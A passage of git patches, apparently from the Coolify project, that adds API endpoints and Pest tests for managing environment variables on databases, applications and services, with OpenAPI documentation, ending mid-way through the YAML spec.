+            'is_preview' => false,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/applications/{$application->uuid}/envs/bulk", [
+            'data' => [
+                [
+                    'key' => 'SECRET',
+                    'value' => 'new-secret',
+                ],
+            ],
+        ]);
+
+        $response->assertStatus(201);
+
+        $env = EnvironmentVariable::where('key', 'SECRET')
+            ->where('resourceable_id', $application->id)
+            ->where('is_preview', false)
+            ->first();
+
+        expect($env->value)->toBe('new-secret');
+        expect($env->comment)->toBe('Keep this comment');
+    });
+
+    test('rejects comment exceeding 256 characters', function () {
+        $application = Application::factory()->create([
+            'environment_id' => $this->environment->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/applications/{$application->uuid}/envs/bulk", [
+            'data' => [
+                [
+                    'key' => 'TEST_VAR',
+                    'value' => 'value',
+                    'comment' => str_repeat('a', 257),
+                ],
+            ],
+        ]);
+
+        $response->assertStatus(422);
+    });
+});
+
+describe('PATCH /api/v1/services/{uuid}/envs/bulk', function () {
+    test('creates environment variables with comments', function () {
+        $service = Service::factory()->create([
+            'server_id' => $this->server->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+            'environment_id' => $this->environment->id,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/services/{$service->uuid}/envs/bulk", [
+            'data' => [
+                [
+                    'key' => 'REDIS_HOST',
+                    'value' => 'redis',
+                    'comment' => 'Redis cache host',
+                ],
+                [
+                    'key' => 'REDIS_PORT',
+                    'value' => '6379',
+                ],
+            ],
+        ]);
+
+        $response->assertStatus(201);
+
+        $envWithComment = EnvironmentVariable::where('key', 'REDIS_HOST')
+            ->where('resourceable_id', $service->id)
+            ->where('resourceable_type', Service::class)
+            ->first();
+
+        $envWithoutComment = EnvironmentVariable::where('key', 'REDIS_PORT')
+            ->where('resourceable_id', $service->id)
+            ->where('resourceable_type', Service::class)
+            ->first();
+
+        expect($envWithComment->comment)->toBe('Redis cache host');
+        expect($envWithoutComment->comment)->toBeNull();
+    });
+
+    test('rejects comment exceeding 256 characters', function () {
+        $service = Service::factory()->create([
+            'server_id' => $this->server->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+            'environment_id' => $this->environment->id,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/services/{$service->uuid}/envs/bulk", [
+            'data' => [
+                [
+                    'key' => 'TEST_VAR',
+                    'value' => 'value',
+                    'comment' => str_repeat('a', 257),
+                ],
+            ],
+        ]);
+
+        $response->assertStatus(422);
+    });
+});

From c00d5de03e9a943270db8bebe7e360b444da24b8 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 19 Mar 2026 23:29:50 +0100
Subject: [PATCH 093/213] feat(api): add database environment variable
 management endpoints

Add CRUD API endpoints for managing environment variables on databases:
- GET /databases/{uuid}/envs - list environment variables
- POST /databases/{uuid}/envs - create environment variable
- PATCH /databases/{uuid}/envs - update environment variable
- PATCH /databases/{uuid}/envs/bulk - bulk create environment variables
- DELETE /databases/{uuid}/envs/{env_uuid} - delete environment variable

Includes comprehensive test suite and OpenAPI documentation.
---
 .../Controllers/Api/DatabasesController.php   | 548 ++++++++++++++++++
 openapi.json                                  | 381 ++++++++++++
 openapi.yaml                                  | 236 ++++++++
 routes/api.php                                |   6 +
 .../DatabaseEnvironmentVariableApiTest.php    | 346 +++++++++++
 5 files changed, 1517 insertions(+)
 create mode 100644 tests/Feature/DatabaseEnvironmentVariableApiTest.php

diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index f7a62cf90..6ad18d872 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -11,6 +11,7 @@
 use App\Http\Controllers\Controller;
 use App\Jobs\DatabaseBackupJob;
 use App\Jobs\DeleteResourceJob;
+use App\Models\EnvironmentVariable;
 use App\Models\Project;
 use App\Models\S3Storage;
 use App\Models\ScheduledDatabaseBackup;
@@ -2750,4 +2751,551 @@ public function action_restart(Request $request)
             200
         );
     }
+
+    private function removeSensitiveEnvData($env)
+    {
+        $env->makeHidden([
+            'id',
+            'resourceable',
+            'resourceable_id',
+            'resourceable_type',
+        ]);
+        if (request()->attributes->get('can_read_sensitive', false) === false) {
+            $env->makeHidden([
+                'value',
+                'real_value',
+            ]);
+        }
+
+        return serializeApiResponse($env);
+    }
+
+    #[OA\Get(
+        summary: 'List Envs',
+        description: 'List all envs by database UUID.',
+        path: '/databases/{uuid}/envs',
+        operationId: 'list-envs-by-database-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Databases'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the database.',
+                required: true,
+                schema: new OA\Schema(
+                    type: 'string',
+                )
+            ),
+        ],
+        responses: [
+            new OA\Response(
+                response: 200,
+                description: 'Environment variables.',
+                content: [
+                    new OA\MediaType(
+                        mediaType: 'application/json',
+                        schema: new OA\Schema(
+                            type: 'array',
+                            items: new OA\Items(ref: '#/components/schemas/EnvironmentVariable')
+                        )
+                    ),
+                ]
+            ),
+            new OA\Response(
+                response: 401,
+                ref: '#/components/responses/401',
+            ),
+            new OA\Response(
+                response: 400,
+                ref: '#/components/responses/400',
+            ),
+            new OA\Response(
+                response: 404,
+                ref: '#/components/responses/404',
+            ),
+        ]
+    )]
+    public function envs(Request $request)
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+        $database = queryDatabaseByUuidWithinTeam($request->uuid, $teamId);
+        if (! $database) {
+            return response()->json(['message' => 'Database not found.'], 404);
+        }
+
+        $this->authorize('view', $database);
+
+        $envs = $database->environment_variables->map(function ($env) {
+            return $this->removeSensitiveEnvData($env);
+        });
+
+        return response()->json($envs);
+    }
+
+    #[OA\Patch(
+        summary: 'Update Env',
+        description: 'Update env by database UUID.',
+        path: '/databases/{uuid}/envs',
+        operationId: 'update-env-by-database-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Databases'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the database.',
+                required: true,
+                schema: new OA\Schema(
+                    type: 'string',
+                )
+            ),
+        ],
+        requestBody: new OA\RequestBody(
+            description: 'Env updated.',
+            required: true,
+            content: [
+                new OA\MediaType(
+                    mediaType: 'application/json',
+                    schema: new OA\Schema(
+                        type: 'object',
+                        required: ['key', 'value'],
+                        properties: [
+                            'key' => ['type' => 'string', 'description' => 'The key of the environment variable.'],
+                            'value' => ['type' => 'string', 'description' => 'The value of the environment variable.'],
+                            'is_literal' => ['type' => 'boolean', 'description' => 'The flag to indicate if the environment variable is a literal, nothing espaced.'],
+                            'is_multiline' => ['type' => 'boolean', 'description' => 'The flag to indicate if the environment variable is multiline.'],
+                            'is_shown_once' => ['type' => 'boolean', 'description' => 'The flag to indicate if the environment variable\'s value is shown on the UI.'],
+                        ],
+                    ),
+                ),
+            ],
+        ),
+        responses: [
+            new OA\Response(
+                response: 201,
+                description: 'Environment variable updated.',
+                content: [
+                    new OA\MediaType(
+                        mediaType: 'application/json',
+                        schema: new OA\Schema(
+                            ref: '#/components/schemas/EnvironmentVariable'
+                        )
+                    ),
+                ]
+            ),
+            new OA\Response(
+                response: 401,
+                ref: '#/components/responses/401',
+            ),
+            new OA\Response(
+                response: 400,
+                ref: '#/components/responses/400',
+            ),
+            new OA\Response(
+                response: 404,
+                ref: '#/components/responses/404',
+            ),
+            new OA\Response(
+                response: 422,
+                ref: '#/components/responses/422',
+            ),
+        ]
+    )]
+    public function update_env_by_uuid(Request $request)
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $database = queryDatabaseByUuidWithinTeam($request->route('uuid'), $teamId);
+        if (! $database) {
+            return response()->json(['message' => 'Database not found.'], 404);
+        }
+
+        $this->authorize('manageEnvironment', $database);
+
+        $validator = customApiValidator($request->all(), [
+            'key' => 'string|required',
+            'value' => 'string|nullable',
+            'is_literal' => 'boolean',
+            'is_multiline' => 'boolean',
+            'is_shown_once' => 'boolean',
+            'comment' => 'string|nullable|max:256',
+        ]);
+
+        if ($validator->fails()) {
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => $validator->errors(),
+            ], 422);
+        }
+
+        $key = str($request->key)->trim()->replace(' ', '_')->value;
+        $env = $database->environment_variables()->where('key', $key)->first();
+        if (! $env) {
+            return response()->json(['message' => 'Environment variable not found.'], 404);
+        }
+
+        $env->value = $request->value;
+        if ($request->has('is_literal')) {
+            $env->is_literal = $request->is_literal;
+        }
+        if ($request->has('is_multiline')) {
+            $env->is_multiline = $request->is_multiline;
+        }
+        if ($request->has('is_shown_once')) {
+            $env->is_shown_once = $request->is_shown_once;
+        }
+        if ($request->has('comment')) {
+            $env->comment = $request->comment;
+        }
+        $env->save();
+
+        return response()->json($this->removeSensitiveEnvData($env))->setStatusCode(201);
+    }
+
+    #[OA\Patch(
+        summary: 'Update Envs (Bulk)',
+        description: 'Update multiple envs by database UUID.',
+        path: '/databases/{uuid}/envs/bulk',
+        operationId: 'update-envs-by-database-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Databases'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the database.',
+                required: true,
+                schema: new OA\Schema(
+                    type: 'string',
+                )
+            ),
+        ],
+        requestBody: new OA\RequestBody(
+            description: 'Bulk envs updated.',
+            required: true,
+            content: [
+                new OA\MediaType(
+                    mediaType: 'application/json',
+                    schema: new OA\Schema(
+                        type: 'object',
+                        required: ['data'],
+                        properties: [
+                            'data' => [
+                                'type' => 'array',
+                                'items' => new OA\Schema(
+                                    type: 'object',
+                                    properties: [
+                                        'key' => ['type' => 'string', 'description' => 'The key of the environment variable.'],
+                                        'value' => ['type' => 'string', 'description' => 'The value of the environment variable.'],
+                                        'is_literal' => ['type' => 'boolean', 'description' => 'The flag to indicate if the environment variable is a literal, nothing espaced.'],
+                                        'is_multiline' => ['type' => 'boolean', 'description' => 'The flag to indicate if the environment variable is multiline.'],
+                                        'is_shown_once' => ['type' => 'boolean', 'description' => 'The flag to indicate if the environment variable\'s value is shown on the UI.'],
+                                    ],
+                                ),
+                            ],
+                        ],
+                    ),
+                ),
+            ],
+        ),
+        responses: [
+            new OA\Response(
+                response: 201,
+                description: 'Environment variables updated.',
+                content: [
+                    new OA\MediaType(
+                        mediaType: 'application/json',
+                        schema: new OA\Schema(
+                            type: 'array',
+                            items: new OA\Items(ref: '#/components/schemas/EnvironmentVariable')
+                        )
+                    ),
+                ]
+            ),
+            new OA\Response(
+                response: 401,
+                ref: '#/components/responses/401',
+            ),
+            new OA\Response(
+                response: 400,
+                ref: '#/components/responses/400',
+            ),
+            new OA\Response(
+                response: 404,
+                ref: '#/components/responses/404',
+            ),
+            new OA\Response(
+                response: 422,
+                ref: '#/components/responses/422',
+            ),
+        ]
+    )]
+    public function create_bulk_envs(Request $request)
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $database = queryDatabaseByUuidWithinTeam($request->route('uuid'), $teamId);
+        if (! $database) {
+            return response()->json(['message' => 'Database not found.'], 404);
+        }
+
+        $this->authorize('manageEnvironment', $database);
+
+        $bulk_data = $request->get('data');
+        if (! $bulk_data) {
+            return response()->json(['message' => 'Bulk data is required.'], 400);
+        }
+
+        $updatedEnvs = collect();
+        foreach ($bulk_data as $item) {
+            $validator = customApiValidator($item, [
+                'key' => 'string|required',
+                'value' => 'string|nullable',
+                'is_literal' => 'boolean',
+                'is_multiline' => 'boolean',
+                'is_shown_once' => 'boolean',
+                'comment' => 'string|nullable|max:256',
+            ]);
+
+            if ($validator->fails()) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => $validator->errors(),
+                ], 422);
+            }
+            $key = str($item['key'])->trim()->replace(' ', '_')->value;
+            $env = $database->environment_variables()->updateOrCreate(
+                ['key' => $key],
+                $item
+            );
+
+            $updatedEnvs->push($this->removeSensitiveEnvData($env));
+        }
+
+        return response()->json($updatedEnvs)->setStatusCode(201);
+    }
+
+    #[OA\Post(
+        summary: 'Create Env',
+        description: 'Create env by database UUID.',
+        path: '/databases/{uuid}/envs',
+        operationId: 'create-env-by-database-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Databases'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the database.',
+                required: true,
+                schema: new OA\Schema(
+                    type: 'string',
+                )
+            ),
+        ],
+        requestBody: new OA\RequestBody(
+            required: true,
+            description: 'Env created.',
+            content: new OA\MediaType(
+                mediaType: 'application/json',
+                schema: new OA\Schema(
+                    type: 'object',
+                    properties: [
+                        'key' => ['type' => 'string', 'description' => 'The key of the environment variable.'],
+                        'value' => ['type' => 'string', 'description' => 'The value of the environment variable.'],
+                        'is_literal' => ['type' => 'boolean', 'description' => 'The flag to indicate if the environment variable is a literal, nothing espaced.'],
+                        'is_multiline' => ['type' => 'boolean', 'description' => 'The flag to indicate if the environment variable is multiline.'],
+                        'is_shown_once' => ['type' => 'boolean', 'description' => 'The flag to indicate if the environment variable\'s value is shown on the UI.'],
+                    ],
+                ),
+            ),
+        ),
+        responses: [
+            new OA\Response(
+                response: 201,
+                description: 'Environment variable created.',
+                content: [
+                    new OA\MediaType(
+                        mediaType: 'application/json',
+                        schema: new OA\Schema(
+                            type: 'object',
+                            properties: [
+                                'uuid' => ['type' => 'string', 'example' => 'nc0k04gk8g0cgsk440g0koko'],
+                            ]
+                        )
+                    ),
+                ]
+            ),
+            new OA\Response(
+                response: 401,
+                ref: '#/components/responses/401',
+            ),
+            new OA\Response(
+                response: 400,
+                ref: '#/components/responses/400',
+            ),
+            new OA\Response(
+                response: 404,
+                ref: '#/components/responses/404',
+            ),
+            new OA\Response(
+                response: 422,
+                ref: '#/components/responses/422',
+            ),
+        ]
+    )]
+    public function create_env(Request $request)
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $database = queryDatabaseByUuidWithinTeam($request->route('uuid'), $teamId);
+        if (! $database) {
+            return response()->json(['message' => 'Database not found.'], 404);
+        }
+
+        $this->authorize('manageEnvironment', $database);
+
+        $validator = customApiValidator($request->all(), [
+            'key' => 'string|required',
+            'value' => 'string|nullable',
+            'is_literal' => 'boolean',
+            'is_multiline' => 'boolean',
+            'is_shown_once' => 'boolean',
+            'comment' => 'string|nullable|max:256',
+        ]);
+
+        if ($validator->fails()) {
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => $validator->errors(),
+            ], 422);
+        }
+
+        $key = str($request->key)->trim()->replace(' ', '_')->value;
+        $existingEnv = $database->environment_variables()->where('key', $key)->first();
+        if ($existingEnv) {
+            return response()->json([
+                'message' => 'Environment variable already exists. Use PATCH request to update it.',
+            ], 409);
+        }
+
+        $env = $database->environment_variables()->create([
+            'key' => $key,
+            'value' => $request->value,
+            'is_literal' => $request->is_literal ?? false,
+            'is_multiline' => $request->is_multiline ?? false,
+            'is_shown_once' => $request->is_shown_once ?? false,
+            'comment' => $request->comment ?? null,
+        ]);
+
+        return response()->json($this->removeSensitiveEnvData($env))->setStatusCode(201);
+    }
+
+    #[OA\Delete(
+        summary: 'Delete Env',
+        description: 'Delete env by UUID.',
+        path: '/databases/{uuid}/envs/{env_uuid}',
+        operationId: 'delete-env-by-database-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Databases'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the database.',
+                required: true,
+                schema: new OA\Schema(
+                    type: 'string',
+                )
+            ),
+            new OA\Parameter(
+                name: 'env_uuid',
+                in: 'path',
+                description: 'UUID of the environment variable.',
+                required: true,
+                schema: new OA\Schema(
+                    type: 'string',
+                )
+            ),
+        ],
+        responses: [
+            new OA\Response(
+                response: 200,
+                description: 'Environment variable deleted.',
+                content: [
+                    new OA\MediaType(
+                        mediaType: 'application/json',
+                        schema: new OA\Schema(
+                            type: 'object',
+                            properties: [
+                                'message' => ['type' => 'string', 'example' => 'Environment variable deleted.'],
+                            ]
+                        )
+                    ),
+                ]
+            ),
+            new OA\Response(
+                response: 401,
+                ref: '#/components/responses/401',
+            ),
+            new OA\Response(
+                response: 400,
+                ref: '#/components/responses/400',
+            ),
+            new OA\Response(
+                response: 404,
+                ref: '#/components/responses/404',
+            ),
+        ]
+    )]
+    public function delete_env_by_uuid(Request $request)
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $database = queryDatabaseByUuidWithinTeam($request->route('uuid'), $teamId);
+        if (! $database) {
+            return response()->json(['message' => 'Database not found.'], 404);
+        }
+
+        $this->authorize('manageEnvironment', $database);
+
+        $env = EnvironmentVariable::where('uuid', $request->route('env_uuid'))
+            ->where('resourceable_type', get_class($database))
+            ->where('resourceable_id', $database->id)
+            ->first();
+
+        if (! $env) {
+            return response()->json(['message' => 'Environment variable not found.'], 404);
+        }
+
+        $env->forceDelete();
+
+        return response()->json(['message' => 'Environment variable deleted.']);
+    }
 }
diff --git a/openapi.json b/openapi.json
index 5477420ab..d119176a1 100644
--- a/openapi.json
+++ b/openapi.json
@@ -6132,6 +6132,387 @@
                 ]
             }
         },
+        "\/databases\/{uuid}\/envs": {
+            "get": {
+                "tags": [
+                    "Databases"
+                ],
+                "summary": "List Envs",
+                "description": "List all envs by database UUID.",
+                "operationId": "list-envs-by-database-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the database.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "responses": {
+                    "200": {
+                        "description": "Environment variables.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "type": "array",
+                                    "items": {
+                                        "$ref": "#\/components\/schemas\/EnvironmentVariable"
+                                    }
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            },
+            "post": {
+                "tags": [
+                    "Databases"
+                ],
+                "summary": "Create Env",
+                "description": "Create env by database UUID.",
+                "operationId": "create-env-by-database-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the database.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "requestBody": {
+                    "description": "Env created.",
+                    "required": true,
+                    "content": {
+                        "application\/json": {
+                            "schema": {
+                                "properties": {
+                                    "key": {
+                                        "type": "string",
+                                        "description": "The key of the environment variable."
+                                    },
+                                    "value": {
+                                        "type": "string",
+                                        "description": "The value of the environment variable."
+                                    },
+                                    "is_literal": {
+                                        "type": "boolean",
+                                        "description": "The flag to indicate if the environment variable is a literal, nothing espaced."
+                                    },
+                                    "is_multiline": {
+                                        "type": "boolean",
+                                        "description": "The flag to indicate if the environment variable is multiline."
+                                    },
+                                    "is_shown_once": {
+                                        "type": "boolean",
+                                        "description": "The flag to indicate if the environment variable's value is shown on the UI."
+                                    }
+                                },
+                                "type": "object"
+                            }
+                        }
+                    }
+                },
+                "responses": {
+                    "201": {
+                        "description": "Environment variable created.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "properties": {
+                                        "uuid": {
+                                            "type": "string",
+                                            "example": "nc0k04gk8g0cgsk440g0koko"
+                                        }
+                                    },
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    },
+                    "422": {
+                        "$ref": "#\/components\/responses\/422"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            },
+            "patch": {
+                "tags": [
+                    "Databases"
+                ],
+                "summary": "Update Env",
+                "description": "Update env by database UUID.",
+                "operationId": "update-env-by-database-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the database.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "requestBody": {
+                    "description": "Env updated.",
+                    "required": true,
+                    "content": {
+                        "application\/json": {
+                            "schema": {
+                                "required": [
+                                    "key",
+                                    "value"
+                                ],
+                                "properties": {
+                                    "key": {
+                                        "type": "string",
+                                        "description": "The key of the environment variable."
+                                    },
+                                    "value": {
+                                        "type": "string",
+                                        "description": "The value of the environment variable."
+                                    },
+                                    "is_literal": {
+                                        "type": "boolean",
+                                        "description": "The flag to indicate if the environment variable is a literal, nothing espaced."
+                                    },
+                                    "is_multiline": {
+                                        "type": "boolean",
+                                        "description": "The flag to indicate if the environment variable is multiline."
+                                    },
+                                    "is_shown_once": {
+                                        "type": "boolean",
+                                        "description": "The flag to indicate if the environment variable's value is shown on the UI."
+                                    }
+                                },
+                                "type": "object"
+                            }
+                        }
+                    }
+                },
+                "responses": {
+                    "201": {
+                        "description": "Environment variable updated.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "$ref": "#\/components\/schemas\/EnvironmentVariable"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    },
+                    "422": {
+                        "$ref": "#\/components\/responses\/422"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            }
+        },
+        "\/databases\/{uuid}\/envs\/bulk": {
+            "patch": {
+                "tags": [
+                    "Databases"
+                ],
+                "summary": "Update Envs (Bulk)",
+                "description": "Update multiple envs by database UUID.",
+                "operationId": "update-envs-by-database-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the database.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "requestBody": {
+                    "description": "Bulk envs updated.",
+                    "required": true,
+                    "content": {
+                        "application\/json": {
+                            "schema": {
+                                "required": [
+                                    "data"
+                                ],
+                                "properties": {
+                                    "data": {
+                                        "type": "array",
+                                        "items": {
+                                            "properties": {
+                                                "key": {
+                                                    "type": "string",
+                                                    "description": "The key of the environment variable."
+                                                },
+                                                "value": {
+                                                    "type": "string",
+                                                    "description": "The value of the environment variable."
+                                                },
+                                                "is_literal": {
+                                                    "type": "boolean",
+                                                    "description": "The flag to indicate if the environment variable is a literal, nothing espaced."
+                                                },
+                                                "is_multiline": {
+                                                    "type": "boolean",
+                                                    "description": "The flag to indicate if the environment variable is multiline."
+                                                },
+                                                "is_shown_once": {
+                                                    "type": "boolean",
+                                                    "description": "The flag to indicate if the environment variable's value is shown on the UI."
+                                                }
+                                            },
+                                            "type": "object"
+                                        }
+                                    }
+                                },
+                                "type": "object"
+                            }
+                        }
+                    }
+                },
+                "responses": {
+                    "201": {
+                        "description": "Environment variables updated.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "type": "array",
+                                    "items": {
+                                        "$ref": "#\/components\/schemas\/EnvironmentVariable"
+                                    }
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    },
+                    "422": {
+                        "$ref": "#\/components\/responses\/422"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            }
+        },
+        "\/databases\/{uuid}\/envs\/{env_uuid}": {
+            "delete": {
+                "tags": [
+                    "Databases"
+                ],
+                "summary": "Delete Env",
+                "description": "Delete env by UUID.",
+                "operationId": "delete-env-by-database-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the database.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    },
+                    {
+                        "name": "env_uuid",
+                        "in": "path",
+                        "description": "UUID of the environment variable.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "responses": {
+                    "200": {
+                        "description": "Environment variable deleted.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "properties": {
+                                        "message": {
+                                            "type": "string",
+                                            "example": "Environment variable deleted."
+                                        }
+                                    },
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            }
+        },
         "\/deployments": {
             "get": {
                 "tags": [
diff --git a/openapi.yaml b/openapi.yaml
index dd03f9c42..7064be28a 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -3973,6 +3973,242 @@ paths:
       security:
         -
           bearerAuth: []
+  '/databases/{uuid}/envs':
+    get:
+      tags:
+        - Databases
+      summary: 'List Envs'
+      description: 'List all envs by database UUID.'
+      operationId: list-envs-by-database-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the database.'
+          required: true
+          schema:
+            type: string
+      responses:
+        '200':
+          description: 'Environment variables.'
+          content:
+            application/json:
+              schema:
+                type: array
+                items:
+                  $ref: '#/components/schemas/EnvironmentVariable'
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+      security:
+        -
+          bearerAuth: []
+    post:
+      tags:
+        - Databases
+      summary: 'Create Env'
+      description: 'Create env by database UUID.'
+      operationId: create-env-by-database-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the database.'
+          required: true
+          schema:
+            type: string
+      requestBody:
+        description: 'Env created.'
+        required: true
+        content:
+          application/json:
+            schema:
+              properties:
+                key:
+                  type: string
+                  description: 'The key of the environment variable.'
+                value:
+                  type: string
+                  description: 'The value of the environment variable.'
+                is_literal:
+                  type: boolean
+                  description: 'The flag to indicate if the environment variable is a literal, nothing espaced.'
+                is_multiline:
+                  type: boolean
+                  description: 'The flag to indicate if the environment variable is multiline.'
+                is_shown_once:
+                  type: boolean
+                  description: "The flag to indicate if the environment variable's value is shown on the UI."
+              type: object
+      responses:
+        '201':
+          description: 'Environment variable created.'
+          content:
+            application/json:
+              schema:
+                properties:
+                  uuid: { type: string, example: nc0k04gk8g0cgsk440g0koko }
+                type: object
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+        '422':
+          $ref: '#/components/responses/422'
+      security:
+        -
+          bearerAuth: []
+    patch:
+      tags:
+        - Databases
+      summary: 'Update Env'
+      description: 'Update env by database UUID.'
+      operationId: update-env-by-database-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the database.'
+          required: true
+          schema:
+            type: string
+      requestBody:
+        description: 'Env updated.'
+        required: true
+        content:
+          application/json:
+            schema:
+              required:
+                - key
+                - value
+              properties:
+                key:
+                  type: string
+                  description: 'The key of the environment variable.'
+                value:
+                  type: string
+                  description: 'The value of the environment variable.'
+                is_literal:
+                  type: boolean
+                  description: 'The flag to indicate if the environment variable is a literal, nothing espaced.'
+                is_multiline:
+                  type: boolean
+                  description: 'The flag to indicate if the environment variable is multiline.'
+                is_shown_once:
+                  type: boolean
+                  description: "The flag to indicate if the environment variable's value is shown on the UI."
+              type: object
+      responses:
+        '201':
+          description: 'Environment variable updated.'
+          content:
+            application/json:
+              schema:
+                $ref: '#/components/schemas/EnvironmentVariable'
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+        '422':
+          $ref: '#/components/responses/422'
+      security:
+        -
+          bearerAuth: []
+  '/databases/{uuid}/envs/bulk':
+    patch:
+      tags:
+        - Databases
+      summary: 'Update Envs (Bulk)'
+      description: 'Update multiple envs by database UUID.'
+      operationId: update-envs-by-database-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the database.'
+          required: true
+          schema:
+            type: string
+      requestBody:
+        description: 'Bulk envs updated.'
+        required: true
+        content:
+          application/json:
+            schema:
+              required:
+                - data
+              properties:
+                data:
+                  type: array
